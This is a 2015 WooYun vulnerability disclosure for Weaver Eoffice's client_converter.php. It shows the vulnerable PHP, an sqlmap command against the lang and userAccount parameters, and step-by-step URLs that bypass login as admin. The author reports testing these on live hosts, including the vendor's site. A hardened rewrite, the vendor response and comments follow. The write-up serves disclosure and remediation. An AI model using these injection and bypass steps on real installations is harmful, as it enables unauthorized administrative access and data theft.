
Vulnerability summary

Defect ID: WooYun-2015-124503

Title: Multiple SQL injections in a 泛微Eoffice file, plus a login bypass that allows direct operation of the backend

Vendor: 泛微Eoffice

Author: Bear baby

Submitted: 2015-07-06 16:59

Published: 2015-10-06 15:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact help@wooyun.org

Tags: none



Vulnerability details

Disclosure status:

2015-07-06: Details reported to the vendor; awaiting vendor handling
2015-07-08: Vendor confirmed; details visible to the vendor only
2015-07-11: Details opened to third-party security partners (绿盟科技, 唐朝安全巡航, 无声信息)
2015-09-01: Details opened to core white hats and experts in the relevant field
2015-09-11: Details opened to regular white hats
2015-09-21: Details opened to intern white hats
2015-10-06: Details made public

Brief description:

I have never received a vulnerability with a $ on it, so here is one to try.

Detailed description:

Vulnerable file: /client_converter.php

The code is as follows:

Code:
<?php
/*********************/
/* */
/* Version : 5.1.0 */
/* Author : RM */
/* Comment : 071223 */
/* */
/*********************/

session_start( );
include_once( "inc/conn.php" );
$userAccount = $_REQUEST['userAccount'];
$langID = $_REQUEST['lang'];
$getLangFlagSQL = "SELECT * FROM language WHERE LANG_ID = ".$langID;
$getLangFlagResult = exequery( $connection, $getLangFlagSQL );
$getLangFlagRow = mysql_fetch_array( $getLangFlagResult );
$lang = $getLangFlagRow['LANG_AB'];
$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";
$cursor = exequery( $connection, $query );
$ROW = mysql_fetch_array( $cursor );
$query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];
$cursor = exequery( $connection, $query );
if ( $ROW1 = mysql_fetch_array( $cursor ) )
{
$LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];
}
$LOGIN_THEME = $ROW['THEME'];
$template = $ROW['TEMPLATE'];
if ( !$template )
{
$template_query = "SELECT TEMPLATE_NAME FROM sys_template WHERE TEMPLATE_DEFAULT = 1 ";
$template_rs = exequery( $connection, $template_query );
if ( $row_tp = mysql_fetch_array( $template_rs ) )
{
$template = $row_tp['TEMPLATE_NAME'];
}
else
{
$template = "8series";
}
}
if ( $template == "8series" )
{
$mainUrl = "/general/index8.php";
}
else if ( $template == "7series" )
{
$mainUrl = "/general/index.php";
}
else
{
$mainUrl = "index8.php";
}
if ( $LOGIN_THEME == "" )
{
$LOGIN_THEME = "default";
}
$LOGIN_THEME = $template."/".$LOGIN_THEME;
$_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];
$_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];
$_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];
$_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];
$_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];
$_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];
$_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];
$_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;
$_SESSION['LOGIN_THEME'] = $LOGIN_THEME;
$_SESSION['LOGIN_LANG_ID'] = $langID;
$_SESSION['LOGIN_LANG'] = $lang;
$targetType = $_REQUEST['target'];
$url = $_REQUEST['goto'];
$funcID = $_REQUEST['funcID'];
if ( $funcID != "" )
{
$query = "update user_menu set FREQUENCY =FREQUENCY+1 where user_id='".$ROW['USER_ID']."' and func_id={$funcID}; ";
exequery( $connection, $query );
}
if ( $targetType == "blank" )
{
header( "location:".$url );
}
else
{
header( "location:".$mainUrl."?goto=".urlencode( $url ) );
}
?>



Injection vulnerabilities:

The injection is present in the following statements:

Code:
$userAccount = $_REQUEST['userAccount'];
$langID = $_REQUEST['lang'];
$getLangFlagSQL = "SELECT * FROM language WHERE LANG_ID = ".$langID; // lang goes straight into the SQL



Query:

Code:
$getLangFlagResult = exequery( $connection, $getLangFlagSQL );
$getLangFlagRow = mysql_fetch_array( $getLangFlagResult );
$lang = $getLangFlagRow['LANG_AB'];
$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'"; // userAccount goes straight into the SQL query
$cursor = exequery( $connection, $query );
$ROW = mysql_fetch_array( $cursor );
... code omitted ...
$funcID = $_REQUEST['funcID'];
if ( $funcID != "" )
{
$query = "update user_menu set FREQUENCY =FREQUENCY+1 where user_id='".$ROW['USER_ID']."' and func_id={$funcID}; "; // funcID goes straight into the SQL query
exequery( $connection, $query );
}



All three parameters above are placed directly into SQL statements that are then executed, which leads to injection.

Code:
sqlmap.py -u "http://localhost/client_converter.php?userAccount=1&lang=1" --dbms=mysql --dbs



[Screenshot: 1.png]

Test against an instance found online:

[Screenshot: 2.png]







Bypassing login to operate the backend directly

The problem lies in the following code:

Code:
$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";
$cursor = exequery( $connection, $query );
$ROW = mysql_fetch_array( $cursor );
$query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];
$cursor = exequery( $connection, $query );
if ( $ROW1 = mysql_fetch_array( $cursor ) )
{
$LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];
}
... code omitted ...
// The userAccount parameter goes into the SQL statement that queries the user table; if a record exists, USER_ID, PASSWORD and the other values are written into the SESSION.
$LOGIN_THEME = $template."/".$LOGIN_THEME;
$_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];
$_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];
$_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];
$_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];
$_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];
$_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];
$_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];
$_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;
$_SESSION['LOGIN_THEME'] = $LOGIN_THEME;
$_SESSION['LOGIN_LANG_ID'] = $langID;
$_SESSION['LOGIN_LANG'] = $lang;

Now look at the file that performs backend authentication, /inc/auth.php. Part of its code is as follows:
session_start( );
include_once( "inc/utility.php" );
include_once( "inc/conn.php" );
global $_sess;
if ( !session_is_registered( "LOGIN_USER_ID" ) ) //LOGIN_USER_ID
{
$url = $_SERVER['PHP_SELF'];
echo "<script>\r\n\ttop.location.href='/login.php';\r\n\t</script>";
exit( );
}
$_sess['lang'] = $_SESSION['LOGIN_LANG'];
$_sess['lg_theme'] = $_SESSION['LOGIN_THEME'];
$lang_file = "lang/".$_sess['lang']."/common.lang.php";
include_once( $lang_file );
includelangpak( "other" );
if ( $_SESSION['LOGIN_OA_ISPIRIT'] != "ispirit" )
{
$sql = "SELECT * FROM SYS_PARA WHERE PARA_NAME = 'LIMIT_LOGIN_TIMES' ";
$re = exequery( $connection, $sql );
$row = mysql_fetch_array( $re );
$lock = $row['PARA_VALUE'];
if ( $lock == "1" )
{
$sid = session_id( );
$uid = $_SESSION['LOGIN_USER_ID'];
$sql = "SELECT SESSION_ID FROM user_online WHERE USER_ID='".$uid."'";
$re = exequery( $connection, $sql );
$row = mysql_fetch_array( $re );
$row['SESSION_ID'];



This file authenticates the user solely by checking the values stored in the session.

Exploitation:

First pick a username, e.g. admin. Visit client_converter.php?userAccount=<username>&lang=cn

[Screenshot: 3.png]

An error is shown, but that does not matter: next, visit the backend home page general/index8.php directly. It is accessible.

[Screenshot: 4.png]

Then visit the user management page, general/system/user/userlist.php.

[Screenshot: 5.png]



Proof of vulnerability:

Test case online:

**.**.**.**:8082/client_converter.php?userAccount=admin&lang=cn

**.**.**.**:8082/general/system/user/userlist.php

[Screenshot: 7.png]

[Screenshot: 8.png]

Vendor's official site

http://**.**.**.**:8028/client_converter.php?userAccount=admin&lang=cn

http://**.**.**.**:8028/general/system/user/userlist.php

[Screenshot: 10.png]

[Screenshot: 11.png]

Fix:

Strictly filter the parameters and raise security awareness.
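The fix recommended above, worked out as code. This is an added example, not the vendor's code: a hardened rewrite of the affected part of client_converter.php that addresses both findings, the request values concatenated into SQL and the login session being populated from an unauthenticated request. It assumes a PDO connection `$pdo` supplied by inc/conn.php, and that LANG_ID and func_id are integer columns, as the unquoted comparisons in the original SQL imply.

```php
<?php
// Added example, not vendor code: hardened rewrite of the vulnerable part of
// client_converter.php. Assumes inc/conn.php provides a PDO connection $pdo
// (the original used exequery() on $connection instead).
session_start();
include_once 'inc/conn.php';

// The original filled the login session from ?userAccount= without any
// authentication. Here the account comes only from an existing login session,
// so this page can no longer mint a session for an arbitrary user.
if (empty($_SESSION['LOGIN_USER_ID'])) {
    header('Location: /login.php');
    exit();
}
$userId = (string) $_SESSION['LOGIN_USER_ID'];

// LANG_ID and func_id are compared unquoted (as numbers) in the original SQL,
// so anything that is not an integer is rejected before reaching the database.
// $_GET is used instead of $_REQUEST so cookies cannot smuggle these values in.
$langID = filter_input(INPUT_GET, 'lang', FILTER_VALIDATE_INT);
$funcID = filter_input(INPUT_GET, 'funcID', FILTER_VALIDATE_INT);
if ($langID === null || $langID === false) {
    http_response_code(400);
    exit('invalid lang');
}

// Every request value is a bound parameter; nothing is concatenated into SQL.
$stmt = $pdo->prepare('SELECT LANG_AB FROM language WHERE LANG_ID = ?');
$stmt->execute([$langID]);
$lang = $stmt->fetchColumn();
if ($lang === false) {
    http_response_code(400);
    exit('unknown lang');
}

$stmt = $pdo->prepare('SELECT TEMPLATE FROM USER WHERE USER_ID = ?');
$stmt->execute([$userId]);
$template = $stmt->fetchColumn() ?: '8series';
$mainUrl = ($template === '7series') ? '/general/index.php' : '/general/index8.php';

if ($funcID !== null && $funcID !== false) {
    $stmt = $pdo->prepare('UPDATE user_menu SET FREQUENCY = FREQUENCY + 1 '
                        . 'WHERE user_id = ? AND func_id = ?');
    $stmt->execute([$userId, $funcID]);
}

// Only the language choice is written back; USER_ID, PASSWORD and privileges
// stay exactly as the real login set them.
$_SESSION['LOGIN_LANG_ID'] = $langID;
$_SESSION['LOGIN_LANG'] = $lang;

$goto = isset($_GET['goto']) ? (string) $_GET['goto'] : '';
header('Location: ' . $mainUrl . '?goto=' . urlencode($goto));
exit();
```

With this change, a request for client_converter.php?userAccount=admin&lang=cn from an unauthenticated client is simply redirected to /login.php, and auth.php's session check is no longer satisfiable without a real login.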

Copyright notice: please credit the source when reposting: Bear baby@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-07-08 15:24

Vendor reply:

CNVD has confirmed the described situation and has notified the software vendor through its previously established handling channels.

Latest status:

None yet


Comments

  1. 2015-07-04 17:12 | xsser, certified white hat ( regular white hat | Rank:297 vulnerabilities:22 | When I look back on everything, will this world be alright? )
    0

    Plenty of yours have a $ on them.

  2. 2015-07-04 17:26 | 茜茜公主 ( regular white hat | Rank:2407 vulnerabilities:413 | Our second child was just born; I've spent these months busy with diapers... ugh... )
    0

    So over the top: "I have never received a vulnerability with a $ on it, so here is one to try."

  3. 2015-07-04 18:27 | Bear baby ( regular white hat | Rank:238 vulnerabilities:28 | I always feel I'll suddenly have an epiphany one day. )
    0

    @xsser Uh, so the $ sign only shows up after waiting a while, is that it?

  4. 2015-07-04 18:28 | Bear baby ( regular white hat | Rank:238 vulnerabilities:28 | I always feel I'll suddenly have an epiphany one day. )
    0

    @茜茜公主 My bad.

  5. 2015-10-06 16:52 | 白无常 ( intern white hat | Rank:92 vulnerabilities:11 )
    0

    And yet there was no $.
